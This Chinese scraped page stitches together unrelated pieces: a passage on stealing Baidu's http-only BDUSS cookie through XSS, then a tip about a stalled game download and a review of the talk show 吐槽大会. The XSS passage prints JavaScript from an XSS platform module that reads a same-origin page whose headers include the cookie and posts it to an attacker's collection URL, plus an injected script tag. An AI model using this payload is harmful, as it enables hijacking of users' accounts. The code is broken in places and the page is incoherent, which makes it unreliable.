本文目录一览:
如何通过 XSS 获取受 http-only さcookie
该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。
02.jpg
这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:
code 区域
var u = ';id={projectId}';
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "", true);
xmlHttp.send(null);
function postSource(cc) {
createXmlHttp();
url = u;
cc = "mycode=" + cc;
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.setRequestHeader("Content-length", cc.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(cc)
}
function writeSource() {
if (xmlHttp.readyState == 4) {
var c = new postSource(xmlHttp.responseText)
}
}
由于是用xmlHttpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:
code 区域
titlewooyun.org/title
p超威蓝猫@wooyun.org/p
script src=;/script
Xss下载游戏一直转圈
看一下是不是网络问题。
一直转圈圈可能是网络出现问题,如果是网络出现问题你关了网络重新开一下应该就可以了,实在不行就关机重启就好了。
怎么评价综艺《吐槽大会》?
《吐槽大会》是一档非常年轻化的脱口秀节目,张绍刚李诞的才华毋庸置疑,但是这档综艺的优点与缺点都非常明显。首先,这档综艺应该是内地第一档让明星敢当众调侃自已的“黑点”的。比如网友调侃唐国强广告接的太多,节目中就让各位脱口秀高手以及唐国强本人拿这种事情自黑了一把。
再比如张雨绮看男人的眼光差、王岳伦靠老婆女儿吃饭、李湘跟谢娜不和等等,这些都是网上热议的明星话题。以往的节目中,节目组及明星本人都会刻意回头这些受争议的话题,讳莫如深,曾经有过不少因为节目组没有按事先约定提到相关问题而与明星产生冲突。但是这档节目却把大家暗暗讨论的事情拿到台面上去说,满足了观众的八卦心态,也让明星本人更加讨喜接地气。
然而,他的缺点恰恰就是这个优点。参加这档节目的明星都敢自黑不错,但是细看就会发现这些自黑的点其实都是网络上比较讨喜的点,并没有多么的敏感。节目做不到让两个真正不和的人相互吐槽,更做不到拿真正受争议的话题来讨论。
明星之前的吐槽像是隔靴搔痒,初看有新意再看套路类似,容易乏味。